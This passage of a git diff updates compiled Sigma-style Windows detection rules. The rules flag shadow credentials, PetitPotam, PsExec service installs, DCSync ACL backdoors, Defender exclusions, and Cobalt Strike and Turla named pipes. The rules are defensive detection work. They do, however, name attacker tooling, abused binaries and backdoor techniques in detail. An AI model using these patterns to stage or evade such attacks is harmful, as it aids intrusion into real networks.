"author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - 
"Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a 
prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim 
Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": 
"file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_generic_medium.json b/rules/rules_windows_generic_medium.json index 6fb470a..00cc792 100644 --- a/rules/rules_windows_generic_medium.json +++ b/rules/rules_windows_generic_medium.json 
@@ -1,795 +1,730 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' 
OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP 
'\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PAExec Default Named Pipe", + "id": 
"f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "description": "Detects PAExec default named pipe", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) 
AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName 
LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR 
